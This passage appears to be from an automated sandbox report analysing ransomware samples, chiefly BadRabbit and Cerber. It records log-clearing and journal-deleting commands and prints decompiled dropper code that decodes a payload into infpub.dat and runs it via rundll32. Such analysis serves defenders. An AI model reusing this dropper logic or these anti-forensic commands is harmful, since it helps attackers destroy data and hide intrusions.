Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Birele.exePID: 272, Parent PID: 3220

General

Target ID:	55
Start time:	14:50:19
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
Imagebase:	0x400000
File size:	119296 bytes
MD5 hash:	41789C704A0EECFDD0048B4B4193E752
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4116, Parent PID: 5332

General

Target ID:	56
Start time:	14:50:20
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 5468, Parent PID: 4152

General

Target ID:	57
Start time:	14:50:21
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit):	true
Commandline:	wevtutil cl Security
Imagebase:	0x1100000
File size:	167936 bytes
MD5 hash:	27C3944EC1E3CAD62641ECBCEB107EE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@Cerber5.exePID: 5456, Parent PID: 3220

General

Target ID:	58
Start time:	14:50:22
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@Cerber5.exe"
Imagebase:	0x400000
File size:	320760 bytes
MD5 hash:	FE1BC60A95B2C2D77CD5D232296A7FA4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.343212020.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.345008675.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.339887192.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.357179404.0000000004DE0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.352110846.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Cerber, Description: Cerber Payload, Source: 0000003A.00000002.357976764.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: cerber3, Description: Cerber3 , Source: 0000003A.00000000.341491369.0000000000448000.00000020.00000001.01000000.0000000A.sdmp, Author: pekeinfo

Show Windows behavior

Chronological Activities

Analysis Process: wevtutil.exePID: 2372, Parent PID: 4152

General

Target ID:	59
Start time:	14:50:23
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\wevtutil.exe
Wow64 process (32bit):	true
Commandline:	wevtutil cl Application
Imagebase:	0x1100000
File size:	167936 bytes
MD5 hash:	27C3944EC1E3CAD62641ECBCEB107EE9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: taskkill.exePID: 3868, Parent PID: 272

General

Target ID:	60
Start time:	14:50:23
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /F /IM explorer.exe
Imagebase:	0x990000
File size:	74752 bytes
MD5 hash:	15E2E0ACD891510C6268CB8899F2A1A1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6852, Parent PID: 3868

General

Target ID:	62
Start time:	14:50:24
Start date:	29/09/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6da640000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: fsutil.exePID: 7632, Parent PID: 4152

General

Target ID:	63
Start time:	14:50:25
Start date:	29/09/2022
Path:	C:\Windows\SysWOW64\fsutil.exe
Wow64 process (32bit):	true
Commandline:	fsutil usn deletejournal /D C:
Imagebase:	0xc0000
File size:	145408 bytes
MD5 hash:	140A43A2237D7D7497D4E0568B518B71
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: SgrmBroker.exePID: 7664, Parent PID: 576

General

Target ID:	64
Start time:	14:50:25
Start date:	29/09/2022
Path:	C:\Windows\System32\SgrmBroker.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\SgrmBroker.exe
Imagebase:	0x7ff6a1820000
File size:	163336 bytes
MD5 hash:	D3170A3F3A9626597EEE1888686E3EA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: Endermanch@DeriaLock.exePID: 5728, Parent PID: 3220

General

Target ID:	65
Start time:	14:50:27
Start date:	29/09/2022
Path:	C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Endermanch@DeriaLock.exe"
Imagebase:	0xf80000
File size:	495616 bytes
MD5 hash:	0A7B70EFBA0AA93D4BC0857B87AC2FCB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Endermanch@BadRabbit.exePID: 5660, Parent PID: 3220COMMON

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12.6%
Total number of Nodes:	87
Total number of Limit Nodes:	13

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 01321690 Relevance: 1.3, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01321690(intOrPtr _a4, intOrPtr* _a8, char _a12, intOrPtr _a16) {
				signed int _v24;
				signed int _v28;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				void* _t24;
				void* _t29;
				intOrPtr* _t32;
				void* _t34;

				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_t32 = _a8;
				_v60 = _a12;
				_v56 = _a16;
				_v48 = _a4;
				_v44 =  *_t32;
				_t24 = E01322CA1( &_v60, "1.2.8", 0x38); // executed
				if(_t24 != 0) {
					return _t24;
				}
				_t34 = E0132173C( &_v60, 4);
				if(_t34 == 1) {
					 *_t32 = _v40;
					_t29 = E01322BD0( &_v60);
				} else {
					E01322BD0( &_v60);
					if(_t34 == 2 || _t34 == 0xfffffffb && _v56 == 0) {
						_t29 = 0xfffffffd;
					} else {
						_t29 = _t34;
					}
				}
				return _t29;
			}

0x01321699
0x0132169d
0x013216a2
0x013216a5
0x013216ab
0x013216b1
0x013216b8
0x013216c4
0x013216cb
0x01321715
0x01321715
0x013216d9
0x013216de
0x01321705
0x0132170b
0x013216e0
0x013216e4
0x013216ec
0x013216ff
0x013216f9
0x013216f9
0x013216f9
0x013216ec
0x00000000

Strings

1.2.8, xrefs: 013216BE

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID:
String ID: 1.2.8
API String ID: 0-509886058
Opcode ID: 85caa745e6c977ff59b6f3a90de416b6d070c88323f63ca33e08ee15d727e1ac
Instruction ID: 139aa2172d9432538c33c29fac1dec67baa720a80e7c256e3a65fede15726a6a
Opcode Fuzzy Hash: 85caa745e6c977ff59b6f3a90de416b6d070c88323f63ca33e08ee15d727e1ac
Instruction Fuzzy Hash: 38113072D00229ABCF10FEACD985ADEBBF8AB14224F100526F911F7290E7709984CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013212C0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 138
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			_entry_(void* __ebx) {
				signed int _v8;
				short _v1568;
				short _v3128;
				char _v4688;
				int _v4692;
				char _v4696;
				char _v4700;
				struct _PROCESS_INFORMATION _v4716;
				struct _STARTUPINFOW _v4784;
				void* __edi;
				void* __esi;
				wchar_t* _t43;
				signed short* _t44;
				void* _t48;
				void* _t49;
				char* _t52;
				char* _t53;
				void* _t56;
				void* _t57;
				wchar_t* _t61;
				signed int _t63;
				signed int _t64;
				void* _t69;
				struct _SECURITY_ATTRIBUTES* _t70;
				signed int _t72;
				long _t74;
				wchar_t* _t78;
				wchar_t** _t79;
				signed int _t80;
				void* _t81;

				_t57 = __ebx;
				E01321660(0x12ac);
				_v8 =  *0x1328000 ^ _t80;
				_t79 = GetCommandLineW;
				_t78 = GetCommandLineW();
				if(_t78 != 0) {
					_v4692 = 0;
					_t79 = CommandLineToArgvW(GetCommandLineW(),  &_v4692);
					if(_t79 != 0) {
						if(_v4692 != 1) {
							_t43 = wcsstr(_t78,  *_t79);
							_t61 =  *_t79;
							_t81 = _t81 + 8;
							_t79 =  &(_t61[0]);
							do {
								_t74 =  *_t61;
								_t61 =  &(_t61[0]);
							} while (_t74 != 0);
							_t63 = _t61 - _t79 >> 1;
							_t44 = _t43 + _t63 * 2;
							if( *(_t43 + _t63 * 2) == 0x22) {
								_t44 =  &(_t44[1]);
							}
							if( *_t44 == 0x20) {
								_t44 =  &(_t44[1]);
							}
							_t73 =  &_v4688 - _t44;
							do {
								_t64 =  *_t44 & 0x0000ffff;
								 *(_t73 + _t44) = _t64;
								_t44 =  &(_t44[1]);
							} while (_t64 != 0);
						} else {
							_t56 = 0;
							do {
								_t5 = _t56 + 0x1326cf0; // 0x350031
								_t72 =  *_t5 & 0x0000ffff;
								 *(_t80 + _t56 - 0x124c) = _t72;
								_t56 = _t56 + 2;
							} while (_t72 != 0);
						}
						if(GetSystemDirectoryW( &_v1568, 0x30c) != 0) {
							_t73 =  &_v1568;
							if(lstrcatW( &_v1568, L"\\rundll32.exe") != 0) {
								_t48 = E013210C0(_t57,  &_v4696, _t78,  &_v4700); // executed
								if(_t48 != 0) {
									_t49 = E01321260(_v4696, _v4700); // executed
									_t57 = _t57;
									if(_t49 != 0) {
										wsprintfW( &_v3128, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1568, L"infpub.dat",  &_v4688);
										_t69 = 0x10;
										_t52 =  &_v4716;
										do {
											 *_t52 = 0;
											_t52 = _t52 + 1;
											_t69 = _t69 - 1;
										} while (_t69 != 0);
										_t70 = 0x44;
										_t53 =  &_v4784;
										do {
											 *_t53 = 0;
											_t53 = _t53 + 1;
											_t70 = _t70 - 1;
										} while (_t70 != 0);
										_t73 =  &_v1568;
										_v4784.cb = 0x44;
										CreateProcessW( &_v1568,  &_v3128, _t70, _t70, _t70, 0x8000000, _t70, _t70,  &_v4784,  &_v4716); // executed
										ExitProcess(0); // executed
									}
								}
							}
						}
					}
				}
				return E01321499(0, _t57, _v8 ^ _t80, _t73, _t78, _t79);
			}

0x013212c0
0x013212c8
0x013212d4
0x013212d8
0x013212e1
0x013212e5
0x013212f2
0x01321305
0x01321309
0x01321316
0x0132133d
0x01321343
0x01321345
0x01321348
0x01321350
0x01321350
0x01321353
0x01321356
0x0132135d
0x01321364
0x01321367
0x01321369
0x01321369
0x01321370
0x01321372
0x01321372
0x0132137b
0x01321380
0x01321380
0x01321383
0x01321387
0x0132138a
0x01321318
0x01321318
0x01321320
0x01321320
0x01321320
0x01321327
0x0132132f
0x01321332
0x01321337
0x013213a3
0x013213ae
0x013213bd
0x013213d0
0x013213d7
0x013213eb
0x013213f0
0x013213f3
0x01321418
0x01321421
0x01321426
0x01321430
0x01321430
0x01321433
0x01321434
0x01321434
0x01321437
0x0132143c
0x01321442
0x01321442
0x01321445
0x01321446
0x01321446
0x01321468
0x0132146f
0x01321479
0x01321481
0x01321481
0x013213f3
0x013213d7
0x013213bd
0x013213a3
0x01321309
0x01321498

APIs

GetCommandLineW.KERNEL32 ref: 013212DF
GetCommandLineW.KERNEL32 ref: 013212FC
CommandLineToArgvW.SHELL32(00000000), ref: 013212FF
wcsstr.MSVCRT ref: 0132133D
GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0132139B
lstrcatW.KERNEL32(?,\rundll32.exe), ref: 013213B5
wsprintfW.USER32 ref: 01321418
CreateProcessW.KERNELBASE ref: 01321479
ExitProcess.KERNEL32 ref: 01321481

Strings

\rundll32.exe, xrefs: 013213A9
D, xrefs: 0132146F
%ws C:\Windows\%ws,#1 %ws, xrefs: 01321412
infpub.dat, xrefs: 01321400

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
API String ID: 39178828-1758013632
Opcode ID: ef03547e162009b1c6ee8890bb0a853a125c57e33677298a770b6f0b29e894cf
Instruction ID: 6b68ee821735e95f880f170f63a649a1ffbaf026bebc80bff74d428326464e33
Opcode Fuzzy Hash: ef03547e162009b1c6ee8890bb0a853a125c57e33677298a770b6f0b29e894cf
Instruction Fuzzy Hash: 1841A0719002289BDB35FF58DD55FEAB379EF44304F044199EA0AD7140EB749A94CF60

Uniqueness

Uniqueness Score: -1.00%

Function 013210C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 133
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E013210C0(void* __ebx, long* __ecx, void* __edi, void** _a4) {
				signed int _v8;
				short _v1568;
				long _v1572;
				WCHAR* _v1576;
				char _v1580;
				long* _v1584;
				void** _v1588;
				void* __esi;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t49;
				void* _t52;
				long _t56;
				void* _t58;
				void* _t63;
				int _t65;
				void* _t66;
				int _t67;
				void* _t68;
				intOrPtr _t69;
				void* _t70;
				long _t76;
				void* _t77;
				void _t85;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t95;
				void* _t97;
				signed int _t98;

				_t89 = __edi;
				_t66 = __ebx;
				_v8 =  *0x1328000 ^ _t98;
				_t86 =  &_v1568;
				_v1588 = _a4;
				_v1584 = __ecx;
				_v1576 = 0;
				if(GetModuleFileNameW(GetModuleHandleW(0),  &_v1568, 0x30c) == 0) {
					L17:
					return E01321499(0, _t66, _v8 ^ _t98, _t86, _t89, 0);
				} else {
					_t46 = E01321000( &_v1568,  &_v1572,  &_v1580); // executed
					if(_t46 == 0) {
						goto L17;
					} else {
						_t76 = _v1572;
						_t47 =  *((intOrPtr*)(_t76 + 0x3c));
						_t48 = _t47 + _t76;
						_t77 = ( *(_t47 + _t76 + 0x14) & 0x0000ffff) + _t48 + 0x18;
						_t88 =  *(_t48 + 6) & 0x0000ffff;
						if(_t88 > 0) {
							_t77 = _t77 + _t88 * 8;
						}
						_t49 =  *((intOrPtr*)(_t48 + 0x98));
						_push(_t89);
						_t91 =  *((intOrPtr*)(_t77 - 0x28 + 0x14)) +  *((intOrPtr*)(_t77 - 0x28 + 0x10));
						if(_t49 == 0) {
							_t49 = _v1580;
						}
						_push(_t66);
						_t67 = _t49 - _t91;
						_t52 = RtlAllocateHeap(GetProcessHeap(), 0, _t67); // executed
						_t97 = _t52;
						if(_t97 == 0) {
							_pop(_t68);
							_pop(_t92);
							return E01321499(_v1576, _t68, _v8 ^ _t98, _t88, _t92, _t97);
						} else {
							memcpy(_t97, _t91 + _v1572, _t67);
							if(_t67 != 0) {
								_t85 =  *_t97;
								_t65 = _t67;
								do {
									_t85 = _t85 ^ 0x000000e9;
									_t65 = _t65 - 1;
								} while (_t65 != 0);
								 *_t97 = _t85;
							}
							_t56 =  *_t97;
							_v1572 = _t56;
							_t58 = RtlAllocateHeap(GetProcessHeap(), 8, _t56); // executed
							 *_v1588 = _t58;
							if(_t58 == 0) {
								L14:
								_t69 = _v1576;
							} else {
								_t28 = _t97 + 4; // 0x4
								_t88 = _t28;
								_t63 = E01321690(_t58,  &_v1572, _t28, _t67 + 0xfffffffc); // executed
								if(_t63 != 0) {
									goto L14;
								} else {
									_t88 = _v1572;
									 *_v1584 = _v1572;
									_t69 = 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t97);
							_pop(_t70);
							_pop(_t95);
							return E01321499(_t69, _t70, _v8 ^ _t98, _t88, _t95, _t97);
						}
					}
				}
			}

0x013210c0
0x013210c0
0x013210d0
0x013210dc
0x013210e6
0x013210ec
0x013210f2
0x01321107
0x0132123e
0x0132124e
0x0132110d
0x01321121
0x01321128
0x00000000
0x0132112e
0x0132112e
0x01321134
0x0132113c
0x0132113e
0x01321142
0x01321148
0x0132114d
0x0132114d
0x01321150
0x01321159
0x0132115d
0x01321162
0x01321164
0x01321164
0x0132116a
0x0132116d
0x01321179
0x0132117f
0x01321183
0x0132122b
0x0132122c
0x0132123b
0x01321189
0x01321192
0x0132119c
0x0132119e
0x013211a0
0x013211a2
0x013211a2
0x013211a5
0x013211a5
0x013211a8
0x013211a8
0x013211aa
0x013211b5
0x013211be
0x013211ca
0x013211ce
0x013211fe
0x013211fe
0x013211d0
0x013211d4
0x013211d4
0x013211e0
0x013211e7
0x00000000
0x013211e9
0x013211e9
0x013211f5
0x013211f7
0x013211f7
0x013211e7
0x0132120a
0x01321212
0x01321213
0x01321222
0x01321222
0x01321183
0x01321128

APIs

GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 013210F8
GetModuleFileNameW.KERNEL32(00000000), ref: 013210FF

Part of subcall function 01321000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0132101A
Part of subcall function 01321000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0132102D
Part of subcall function 01321000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0132103D
Part of subcall function 01321000: RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01321044
Part of subcall function 01321000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01321060
Part of subcall function 01321000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01321071
Part of subcall function 01321000: HeapFree.KERNEL32(00000000,?,?), ref: 01321078
Part of subcall function 01321000: CloseHandle.KERNEL32(00000000,?), ref: 01321080

GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 01321172
RtlAllocateHeap.NTDLL(00000000,?,00000000,?,?), ref: 01321179
memcpy.MSVCRT ref: 01321192
GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 013211BB
RtlAllocateHeap.NTDLL(00000000), ref: 013211BE
GetProcessHeap.KERNEL32(00000000,00000000), ref: 01321207
HeapFree.KERNEL32(00000000), ref: 0132120A

Strings

Uet, xrefs: 0132120A

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: Heap$Process$File$Allocate$FreeHandleModule$CloseCreateNameReadSizememcpy
String ID: Uet
API String ID: 3076684055-2766386878
Opcode ID: 5c1357181c693cc9f931cfbe1271a015a1b5cc4357a44bd0e06cbf2ff11c2445
Instruction ID: 63a5b4fbfe1c9525de51108cd46912b72a4f444d3fee99d36660371bcac8395d
Opcode Fuzzy Hash: 5c1357181c693cc9f931cfbe1271a015a1b5cc4357a44bd0e06cbf2ff11c2445
Instruction Fuzzy Hash: F741B5B1A012289BDB30EF69DD44FAAB7BDFF98304F104199E909D7241DA31E954CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01321000 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01321000(WCHAR* __eax, void** _a4, long* _a8) {
				long _v8;
				DWORD* _v12;
				void* _t11;
				void* _t17;
				long _t18;
				void* _t24;
				void* _t28;
				long _t32;

				_v12 = 0;
				_t11 = CreateFileW(__eax, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t24 = _t11;
				if(_t24 == 0xffffffff) {
					return 0;
				} else {
					_t32 = GetFileSize(_t24, 0);
					if(_t32 == 0) {
						L8:
						FindCloseChangeNotification(_t24); // executed
						return _v12;
					} else {
						_t17 = RtlAllocateHeap(GetProcessHeap(), 0, _t32); // executed
						_t28 = _t17;
						if(_t28 == 0) {
							L7:
							goto L8;
						} else {
							_v8 = 0;
							_t18 = ReadFile(_t24, _t28, _t32,  &_v8, 0); // executed
							if(_t18 != 0 || _v8 != _t32) {
								 *_a4 = _t28;
								 *_a8 = _t32;
								_v12 = 1;
								goto L7;
							} else {
								HeapFree(GetProcessHeap(), _t18, _t28);
								CloseHandle(_t24);
								return _v12;
							}
						}
					}
				}
			}

0x01321017
0x0132101a
0x01321020
0x01321025
0x013210bc
0x0132102b
0x01321033
0x01321037
0x013210a3
0x013210a4
0x013210b2
0x01321039
0x01321044
0x0132104a
0x0132104e
0x013210a2
0x00000000
0x01321050
0x01321059
0x01321060
0x01321068
0x01321097
0x01321099
0x0132109b
0x00000000
0x0132106f
0x01321078
0x01321080
0x0132108e
0x0132108e
0x01321068
0x0132104e
0x01321037

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0132101A
GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0132102D
GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0132103D
RtlAllocateHeap.NTDLL(00000000,?,?,?), ref: 01321044
ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 01321060
GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 01321071
HeapFree.KERNEL32(00000000,?,?), ref: 01321078
CloseHandle.KERNEL32(00000000,?), ref: 01321080
FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 013210A4

Strings

Uet, xrefs: 01321078

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: Heap$File$CloseProcess$AllocateChangeCreateFindFreeHandleNotificationReadSize
String ID: Uet
API String ID: 631125692-2766386878
Opcode ID: 88599b4e55636bc95ba9314f7511cd42ef3c110bd1c0526d50552c4aaa73cef5
Instruction ID: bba4933497bf15fc15922fe37b64ae09e696ccdaf58637dc708c6dfb38c46a14
Opcode Fuzzy Hash: 88599b4e55636bc95ba9314f7511cd42ef3c110bd1c0526d50552c4aaa73cef5
Instruction Fuzzy Hash: 17215172A01224ABC730AEA9AC4CF9BFF6CEB45762F108159F90992244D6358984C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 01321260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01321260(long __ebx, long _a4) {
				void* _t4;
				int _t7;
				struct _OVERLAPPED* _t11;
				void* _t12;

				_t11 = 0;
				_t4 = CreateFileW(L"C:\\Windows\\infpub.dat", 0x40000000, 0, 0, 2, 0, 0); // executed
				_t12 = _t4;
				if(_t12 != 0xffffffff) {
					_t7 = WriteFile(_t12, _a4, __ebx,  &_a4, 0); // executed
					if(_t7 != 0 && _a4 == __ebx) {
						_t11 = 1;
					}
					FindCloseChangeNotification(_t12); // executed
				}
				return _t11;
			}

0x01321265
0x01321277
0x0132127d
0x01321282
0x0132128f
0x01321297
0x0132129e
0x0132129e
0x013212a4
0x013212a4
0x013212af

APIs

CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,013213F0,?,?,?), ref: 01321277
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,013213F0,?,?,?), ref: 0132128F
FindCloseChangeNotification.KERNELBASE(00000000,?,013213F0,?,?,?), ref: 013212A4

Strings

C:\Windows\infpub.dat, xrefs: 01321272

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: C:\Windows\infpub.dat
API String ID: 3805958096-2284094909
Opcode ID: 2acf3a749e8cd19ba1469064ade2975dda66c98c88e7d4b8ef3274b1ae3964fc
Instruction ID: d5e4703b6e7d11f8c98afc754e710f9b3850ad38c31995fef0e378f513dd2456
Opcode Fuzzy Hash: 2acf3a749e8cd19ba1469064ade2975dda66c98c88e7d4b8ef3274b1ae3964fc
Instruction Fuzzy Hash: DFF0A7B6A012247BD7307E5AEC4CF977E2CEBC7BA5F00812DFA04C6184D6705881C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 01323393 Relevance: 1.3, APIs: 1, Instructions: 9
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01323393(signed int _a8, signed int _a12) {
				void* _t5;

				_t5 = malloc(_a8 * _a12); // executed
				return _t5;
			}

0x0132339e
0x013233a5

APIs

malloc.MSVCRT ref: 0132339E

Memory Dump Source

Source File: 00000001.00000002.279315989.0000000001321000.00000020.00000001.01000000.00000006.sdmp, Offset: 01320000, based on PE: true

Associated: 00000001.00000002.279306762.0000000001320000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279324500.0000000001324000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.279331497.0000000001329000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1320000_Endermanch@BadRabbit.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
Instruction ID: 838394688ee86ada720d848b0d5676afc65687db2f3f76fc35ec5e742d4467d1
Opcode Fuzzy Hash: e556b537d4fe67859f682bc138546e7994fb1432b70124257811653e42ab8f21
Instruction Fuzzy Hash: 1BB0923204834E6B8B04EE99AA8685A73DCAA64524B444416F91C8B540D931F5104658

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0132201D Relevance: 15.8, Strings: 12, Instructions: 826
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E0132201D(signed int* __ebx, signed int __ecx, unsigned int __edx, signed int __edi, signed char** __esi) {
				signed int _t753;
				signed int _t785;
				signed int _t787;
				signed int _t792;
				signed int _t793;
				signed int _t796;
				signed int _t800;
				signed int* _t920;
				signed int _t928;
				signed int _t935;
				void* _t940;
				unsigned int _t1054;
				signed int _t1055;
				signed int _t1056;
				signed int _t1060;
				signed int _t1103;
				intOrPtr _t1105;
				signed int _t1106;
				signed char** _t1125;
				intOrPtr* _t1127;
				void* _t1164;

				L0:
